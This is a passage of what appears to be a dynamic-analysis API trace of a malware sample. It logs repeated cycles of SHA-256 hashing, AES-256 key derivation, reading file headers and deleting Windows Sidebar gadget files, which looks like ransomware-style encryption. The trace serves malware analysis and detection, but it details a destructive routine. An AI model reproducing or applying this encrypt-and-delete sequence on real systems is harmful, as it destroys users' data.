files\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_up.png")) returned 0 [0188.421] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.422] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.422] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.422] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.422] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcc4 [0188.422] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.424] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.424] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.424] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.425] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_down.png")) returned 0 [0188.426] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.427] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.427] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.427] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.427] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd64 [0188.427] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.438] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.438] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.438] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.440] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_over.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_over.png")) returned 0 [0188.440] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.441] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.441] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.441] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.441] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb71 [0188.441] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.443] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.443] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.443] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.444] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_up.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_up.png")) returned 0 [0188.447] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.448] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.448] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.448] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.448] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2d9 [0188.448] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.457] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.457] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.457] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.459] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\info.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\info.png")) returned 0 [0188.460] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.460] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.460] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.460] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.460] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbda [0188.460] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.463] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.463] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.463] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.464] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\row_over.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\row_over.png")) returned 0 [0188.464] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.465] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.465] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.465] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.465] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb0f [0188.465] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.467] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.467] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.467] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.469] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\triangle.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\triangle.png")) returned 0 [0188.470] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0188.471] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0188.471] CryptHashData (hHash=0x284d668, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.471] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0188.471] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x172a [0188.471] ReadFile (in: hFile=0x598, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0188.474] CryptDestroyHash (hHash=0x284d668) returned 1 [0188.474] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0188.474] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.476] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\logo.png")) returned 0 [0188.477] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.477] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.478] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.479] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.479] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.479] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0188.479] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf14 [0188.479] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.543] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.543] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.543] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.544] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\flyout.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\flyout.css")) returned 0 [0188.546] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.547] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.547] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.547] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0188.547] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x19ac [0188.547] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.565] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.565] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.565] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.566] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\main.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\main.css")) returned 0 [0188.567] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.568] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.568] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.568] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0188.568] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x66c [0188.568] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.578] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.578] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.578] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.580] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\settings.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\settings.css")) returned 0 [0188.580] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.581] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.581] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.581] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.582] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0188.582] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4dc [0188.582] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.584] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.584] CryptDestroyKey (hKey=0x284d668) returned 1 [0188.584] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.585] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\en-us\\gadget.xml")) returned 0 [0188.585] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0188.586] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0188.586] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.586] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0188.586] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x19f2 [0188.586] ReadFile (in: hFile=0x5a0, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0188.601] CryptDestroyHash (hHash=0x284d568) returned 1 [0188.601] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0188.601] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.603] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\flyout.html")) returned 0 [0188.637] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.638] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.639] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.639] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.639] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.639] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb8 [0188.639] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.641] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.641] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.641] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.641] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_left_mousedown.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_left_mousedown.png")) returned 0 [0188.642] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.642] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.642] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.642] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.642] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb8 [0188.643] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.644] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.644] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.644] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.646] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_left_mouseout.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_left_mouseout.png")) returned 0 [0188.647] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.647] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.647] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.647] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.647] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb8 [0188.647] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.649] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.649] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.649] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.650] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_left_mouseover.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_left_mouseover.png")) returned 0 [0188.651] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.652] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.652] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.652] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.652] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x69c [0188.652] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.655] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.655] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.655] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.656] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_MCELogo_mousedown.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_mcelogo_mousedown.png")) returned 0 [0188.656] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.657] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.657] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.657] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.657] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x69c [0188.657] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.659] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.660] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.660] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.661] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_MCELogo_mouseout.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_mcelogo_mouseout.png")) returned 0 [0188.661] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.662] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.662] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.662] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.662] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6bd [0188.662] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.664] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.664] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.664] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.665] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_MCELogo_mouseover.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_mcelogo_mouseover.png")) returned 0 [0188.666] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.666] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.666] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.666] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: 